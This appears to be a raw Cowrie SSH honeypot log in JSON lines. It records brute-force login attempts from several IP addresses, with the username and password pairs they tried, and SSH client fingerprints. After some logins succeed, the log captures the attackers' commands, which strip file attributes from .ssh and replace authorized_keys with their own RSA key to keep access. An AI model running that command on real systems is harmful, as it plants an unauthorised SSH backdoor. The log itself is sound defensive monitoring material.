{"eventid":"cowrie.login.success","username":"root","password":"server!","message":"login attempt [root/server!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:19:47.424291Z","src_ip":"103.187.147.214","session":"7d4f70d7a5ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:19:47.977466Z","src_ip":"103.187.147.214","session":"7d4f70d7a5ef"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:19:47.978198Z","src_ip":"103.187.147.214","session":"7d4f70d7a5ef"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:19:47.979436Z","src_ip":"103.187.147.214","session":"7d4f70d7a5ef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:48.230880Z","src_ip":"103.187.147.214","session":"7d4f70d7a5ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:19:48.744931Z","src_ip":"103.187.147.214","session":"7d4f70d7a5ef"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:19:48.745636Z","src_ip":"103.187.147.214","session":"7d4f70d7a5ef"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:19:48.998814Z","src_ip":"103.187.147.214","session":"7d4f70d7a5ef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:48.999815Z","src_ip":"103.187.147.214","session":"7d4f70d7a5ef"}
{"eventid":"cowrie.session.connect","src_ip":"103.187.147.214","src_port":59306,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c07e3969d3b","protocol":"ssh","message":"New connection: 103.187.147.214:59306 (1.2.3.4:22) [session: 1c07e3969d3b]","sensor":"my-vps","timestamp":"2025-09-08T13:19:49.257001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:19:49.257680Z","src_ip":"103.187.147.214","session":"1c07e3969d3b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:19:49.515259Z","src_ip":"103.187.147.214","session":"1c07e3969d3b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:19:50.591333Z","src_ip":"103.187.147.214","session":"1c07e3969d3b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:51.851586Z","src_ip":"103.187.147.214","session":"1c07e3969d3b"}
{"eventid":"cowrie.session.connect","src_ip":"103.187.147.214","src_port":39922,"dst_ip":"1.2.3.4","dst_port":22,"session":"a914da259594","protocol":"ssh","message":"New connection: 103.187.147.214:39922 (1.2.3.4:22) [session: a914da259594]","sensor":"my-vps","timestamp":"2025-09-08T13:19:52.106544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:19:52.107384Z","src_ip":"103.187.147.214","session":"a914da259594"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:19:52.362006Z","src_ip":"103.187.147.214","session":"a914da259594"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:19:53.414177Z","src_ip":"103.187.147.214","session":"a914da259594"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:53.665777Z","src_ip":"103.187.147.214","session":"7d4f70d7a5ef"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:19:53.669951Z","src_ip":"103.187.147.214","session":"a914da259594"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36664,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d81b5133f72","protocol":"ssh","message":"New connection: 212.227.235.229:36664 (1.2.3.4:22) [session: 5d81b5133f72]","sensor":"my-vps","timestamp":"2025-09-08T13:20:00.072198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:20:00.072907Z","src_ip":"212.227.235.229","session":"5d81b5133f72"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:20:00.175766Z","src_ip":"212.227.235.229","session":"5d81b5133f72"}
{"eventid":"cowrie.login.failed","username":"share","password":"share123","message":"login attempt [share/share123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:20:00.644235Z","src_ip":"212.227.235.229","session":"5d81b5133f72"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:20:01.780442Z","src_ip":"212.227.235.229","session":"5d81b5133f72"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":50822,"dst_ip":"1.2.3.4","dst_port":22,"session":"deb008841b04","protocol":"ssh","message":"New connection: 134.199.174.250:50822 (1.2.3.4:22) [session: deb008841b04]","sensor":"my-vps","timestamp":"2025-09-08T13:20:11.422431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:20:11.423442Z","src_ip":"134.199.174.250","session":"deb008841b04"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:20:11.756972Z","src_ip":"134.199.174.250","session":"deb008841b04"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1q2w3e4r","message":"login attempt [oracle/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T13:20:12.954434Z","src_ip":"134.199.174.250","session":"deb008841b04"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:20:14.297163Z","src_ip":"134.199.174.250","session":"deb008841b04"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":33740,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d9c5a39f678","protocol":"ssh","message":"New connection: 49.247.35.31:33740 (1.2.3.4:22) [session: 2d9c5a39f678]","sensor":"my-vps","timestamp":"2025-09-08T13:20:15.714395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:20:15.722711Z","src_ip":"49.247.35.31","session":"2d9c5a39f678"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:20:15.983707Z","src_ip":"49.247.35.31","session":"2d9c5a39f678"}
{"eventid":"cowrie.login.failed","username":"csgo","password":"csgoserver","message":"login attempt [csgo/csgoserver] failed","sensor":"my-vps","timestamp":"2025-09-08T13:20:17.040743Z","src_ip":"49.247.35.31","session":"2d9c5a39f678"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:20:18.319103Z","src_ip":"49.247.35.31","session":"2d9c5a39f678"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51538,"dst_ip":"1.2.3.4","dst_port":22,"session":"636ac7fd15a4","protocol":"ssh","message":"New connection: 212.227.235.229:51538 (1.2.3.4:22) [session: 636ac7fd15a4]","sensor":"my-vps","timestamp":"2025-09-08T13:20:20.719976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:20:20.720928Z","src_ip":"212.227.235.229","session":"636ac7fd15a4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:20:21.034096Z","src_ip":"212.227.235.229","session":"636ac7fd15a4"}
{"eventid":"cowrie.login.failed","username":"client1","password":"client1","message":"login attempt [client1/client1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:20:22.315404Z","src_ip":"212.227.235.229","session":"636ac7fd15a4"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:20:23.622826Z","src_ip":"212.227.235.229","session":"636ac7fd15a4"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":49708,"dst_ip":"1.2.3.4","dst_port":22,"session":"e52e79b433cc","protocol":"ssh","message":"New connection: 139.59.14.27:49708 (1.2.3.4:22) [session: e52e79b433cc]","sensor":"my-vps","timestamp":"2025-09-08T13:20:38.522503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:20:38.523493Z","src_ip":"139.59.14.27","session":"e52e79b433cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:20:38.855265Z","src_ip":"139.59.14.27","session":"e52e79b433cc"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd2025","message":"login attempt [root/Passw0rd2025] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:20:40.206958Z","src_ip":"139.59.14.27","session":"e52e79b433cc"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":36808,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c26d0db86dd","protocol":"ssh","message":"New connection: 134.199.174.250:36808 (1.2.3.4:22) [session: 8c26d0db86dd]","sensor":"my-vps","timestamp":"2025-09-08T13:20:40.417808Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:20:40.418794Z","src_ip":"134.199.174.250","session":"8c26d0db86dd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:20:40.822635Z","src_ip":"134.199.174.250","session":"8c26d0db86dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:20:40.899095Z","src_ip":"139.59.14.27","session":"e52e79b433cc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:20:40.899802Z","src_ip":"139.59.14.27","session":"e52e79b433cc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:20:40.900821Z","src_ip":"139.59.14.27","session":"e52e79b433cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:20:41.226022Z","src_ip":"139.59.14.27","session":"e52e79b433cc"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"pass123","message":"login attempt [oracle/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:20:41.754987Z","src_ip":"134.199.174.250","session":"8c26d0db86dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:20:41.941652Z","src_ip":"139.59.14.27","session":"e52e79b433cc"}
